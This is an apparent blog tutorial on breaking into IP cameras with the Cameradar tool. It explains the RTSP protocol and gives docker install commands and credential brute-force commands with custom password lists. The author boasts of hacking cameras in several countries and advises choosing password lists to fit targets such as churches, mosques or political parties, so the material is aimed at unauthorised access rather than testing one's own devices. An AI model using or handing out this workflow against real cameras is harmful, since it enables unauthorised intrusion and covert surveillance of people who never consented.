
Cameradar🎥: Hack IP Cameras😈 --Be Omniscient --👻

CyberMorans🤗


As you may know, we have played some OSINT roles for Ukraine since the invasion began. One of these roles is the hacking of IP cameras throughout the country. In this way, we can spy on Russian activities and war crimes☠️ We did this at the request of the Ukraine Army starting in February 2022 😛

To hack these cameras we use multiple methods and techniques😎 In hacking, always explore multiple methods to be successful. -- Persistence is a key hacker 😈 trait --

As a hacker😈 it is important to take a strategic approach to any target. Always use the simplest methods first before progressing to more advanced attack methods😎

First step, we identified the unprotected☠️ cameras using such sites as Shodan, Google Dorks, and Censys. Then, we tried default credentials. These default credentials vary by camera and manufacturer, but that technique resulted in pwning a few cameras😕


Next, we tried to hack the cameras with weak passwords☠️. This produced way more successful results! The primary tool used is Cameradar😈

In this tutorial, I will show you how to use Cameradar for IP camera hacking just like we did!


🚀 Real Time Streaming Protocol: RTSP

RTSP is the protocol that most of these IP cameras use. Not all of the cameras use RTSP, but the vast majority do. Before proceeding, note that cameras using proprietary or other protocols will not be exploitable by cameradar😐


RTSP is an application-layer protocol used for commanding streaming media servers via pause and play capabilities. It thereby facilitates real-time control of the streaming media by communicating with the server☺️ — without actually transmitting the data itself.


It is an application-level network communication system that transfers real-time data from multimedia to an endpoint device by communicating directly with the server streaming the data🎥


The protocol establishes and controls the media stream between client devices and servers by serving as a network remote control for time-synchronized streams of continuous media, such as audio and video🙂

It does not stream the multimedia itself but communicates with the server that streams the multimedia data🧐 -- When a user pauses a video they are streaming, RTSP would convey the user's request to pause the video to the video streaming server-- ☺️

Like HTTP, RTSP uses TCP to maintain an end-to-end connection and, while most RTSP control messages are sent by the client to the server, some commands travel in the other direction😋

🚀 RTSP commands

Sent from the client to the server, when negotiating and controlling media transmissions:


👉 Options: This request determines what other types of requests the media server will accept.

👉 Describe: A describe request identifies the URL and type of data.

👉 Announce: The announce method describes the presentation when sent from the client to the server and updates the description when sent from server to client.

👉 Setup: Setup requests specify how a media stream must be transported before a play request is sent.

👉 Play: A play request starts the media transmission by telling the server to start sending the data.

👉 Pause: Pause requests temporarily halt the stream delivery.

👉 Record: A record request initiates a media recording.

👉 Teardown: This request terminates the session entirely and stops all media streams.

👉 Redirect: Redirect requests inform the client that it must connect to another server by providing a new URL for the client to issue requests to.


Other types of RTSP requests include 'get parameter', 'set parameter', and 'embedded binary data'.


Now, you are ready to start cracking IP cameras! 😆


🚀 Download and Install cameradar

Cameradar can be run natively in Linux, but it works best in a docker container.


First, install docker 👇

kali > sudo apt install docker.io

Next, start docker with the systemctl command👇

kali > sudo systemctl start docker

Now, download cameradar👇

kali > sudo git clone https://github.com/Ullaakut/cameradar

Now, let's brute-force some IP cameras! ✊


🚀 Run the RTSP Credential Brute-forcer

Now that you have docker and cameradar installed, you only need to point cameradar at the IP address of the camera that you want to brute-force! For instance, to brute force a camera at 192.168.1.1 , we would 👇

kali > sudo docker run  ullaakut/cameradar -t 192.168.1.101

Cameradar will now attempt to find an RTSP stream at one of the default RTSP ports, namely 554, 5554 and 8554. If you suspect there may be other ports with RTSP streams --you may want to run an nmap scan first--, you can add them with the -p switch 👇

kali > sudo docker run  ullaakut/cameradar -t 192.168.1.101 -p 9554

🚀 Use Custom Username & Password Lists

By default, cameradar uses a small username and password list of the most common usernames and passwords. It's a good strategy to use these first, but if they are unsuccessful, it's time to think out of the box!😁


This means larger and more appropriate username and password lists --I personally like seclists-- . However from experience hacking cameras in Ukraine, Mexico, Syria, Sudan and Russia, the usernames usually are simple, such as admin, root, admin1, admin3, etc. This means that you can probably use the default username list but passwords do vary😉

That's why you should use a good password list that is appropriate for your environment and/or context of your target 🤌--i.e., using a Spanish list in a Spanish speaking nation -- or the equivalent for a church, mosque, military, political parties etc--👌

First, the password list MUST🤌 be in json format. There are several websites that can convert your text file to json for free such as https://anyconv.com/txt-to-json-converter/. Your .txt file will then be converted to one with a json extension. So, if we were using the seclist's password list 👇

/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt

I would first convert it to json format and then use that file with cameradar. It will then appear as 10-million-password-list-top-1000000.json. Now to use that password list with cameradar, you can run the command 👇

kali>  sudo docker run  ullaakut/cameradar -t  

-v /usr/share/seclists/Passwords/Common-Credentials:/tmp/dictionaries 

-c "tmp/dictionaries/10-million-password-list-top-1000000.json"

-t 192.168.1.101

🚀 This is easier than it seems...

Once you become familiar with the RTSP protocol, password cracking of IP camera credentials follows a similar process as other remote password cracking techniques. In fact, it may even be easier since the RTSP protocol rarely imposes a lockout limit on the number of attempts made. With cameradar, we were able to gain access to a significant number of IP cameras that had weak passwords😲


🚀Conclusion 🤖

Subscribe to receive notifications of similar posts 😜 where we will be reverse engineering malware, vulnerabilities as well as hacking vectors, stories, tutorials and other Infosec stuff...😋


Follow me on twitter for daily Infosec Memes and shenanigans


Morans,

Thank you for taking time and hope you learned something new, Like and leave a comment/review and as always, stay awesome! 😋👊 💪

©2022 by MORAN.